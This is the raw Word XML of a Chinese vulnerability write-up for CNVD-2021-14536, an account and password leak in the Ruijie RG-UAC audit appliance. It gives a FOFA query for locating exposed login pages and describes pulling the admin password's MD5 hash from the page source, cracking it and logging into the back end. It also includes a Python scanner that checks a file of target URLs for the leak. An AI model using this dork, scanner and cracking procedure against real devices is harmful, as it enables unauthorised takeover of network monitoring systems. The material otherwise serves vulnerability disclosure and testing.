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锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露漏洞 CNVD-2021-14536</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一、</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞影响</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>锐捷RG-UAC统一上网行为管理审计系统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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用FOFA语句包含关键字查找FOFA语句（仅供学习参考，请勿非法利用）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title="RG-UAC登录页面" &amp;&amp; body="admin"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="2597785"/>
            <wp:effectExtent l="0" t="0" r="254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7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>登录页面如下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="248539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  <w:t>查看网页源码搜索关键字  admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5263515" cy="1174750"/>
            <wp:effectExtent l="0" t="0" r="95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7"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用 password值 md5解密</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="198755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7"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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7"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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7"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:fill="FFFFFF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7"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用admin作为用户名，破解的密码即可登录后台系统</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5128260" cy="1524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四、</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞利用POC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import requests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import sys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import re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from requests.packages.urllib3.exceptions import InsecureRequestWarning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def title():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print('+------------------------------------------')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print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')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print('+  \033[34mVersion: 锐捷RG-UAC统一上网行为管理审计系统                             \033[0m')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print('+  \033[36m使用格式:  python3 poc.py                                            \033[0m')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print('+  \033[36mFile </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; ip.txt\033[0m')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print('+------------------------------------------')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def POC_1(target_url):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vuln_url = target_url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headers =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"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",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requests.packages.urllib3.disable_warnings(InsecureRequestWarning)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response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)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if "super_admin" in response.text and "password" in response.text and response.status_code == 200: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    print("\033[32m[o] 目标 {}存在漏洞 ,F12查看源码获取密码md5值 \033[0m".format(target_url))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    print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url))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except Exception as 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print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url))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def Scan(file_name):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with open(file_name, "r", encoding='utf8') as scan_url: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for url in scan_url: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    if url[:4] != "http":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        url = "http://" + url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    url = url.strip('\n')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    try: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        POC_1(url)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        print("\033[31m[x] 请求报错 \033[0m".format(e))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            continue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title()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file_name  = str(input("\033[35mPlease input Attack File\nFile &gt;&gt;&gt; \033[0m"))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 xml:space="preserve">    Scan(file_name)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  <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5151120" cy="20040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29A5"/>
    <w:rsid w:val="06506606"/>
    <w:rsid w:val="091A3E21"/>
    <w:rsid w:val="16600D4B"/>
    <w:rsid w:val="19BC7F51"/>
    <w:rsid w:val="1A2561DC"/>
    <w:rsid w:val="1B781FE7"/>
    <w:rsid w:val="209716EE"/>
    <w:rsid w:val="22842410"/>
    <w:rsid w:val="258F32C5"/>
    <w:rsid w:val="2E8A688D"/>
    <w:rsid w:val="30A148A1"/>
    <w:rsid w:val="36B415AE"/>
    <w:rsid w:val="390538BC"/>
    <w:rsid w:val="39C433F5"/>
    <w:rsid w:val="3CFA09AF"/>
    <w:rsid w:val="436E2C5D"/>
    <w:rsid w:val="454A23D1"/>
    <w:rsid w:val="4A621207"/>
    <w:rsid w:val="4BF45588"/>
    <w:rsid w:val="4CFA3D58"/>
    <w:rsid w:val="50DA3D5A"/>
    <w:rsid w:val="51421BC6"/>
    <w:rsid w:val="5429294A"/>
    <w:rsid w:val="5ECB58CB"/>
    <w:rsid w:val="5F216706"/>
    <w:rsid w:val="61A3738B"/>
    <w:rsid w:val="649E6303"/>
    <w:rsid w:val="674F6F8F"/>
    <w:rsid w:val="76653C62"/>
    <w:rsid w:val="794A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2021-03-08T08:52:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>wll</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-08T09:28:41Z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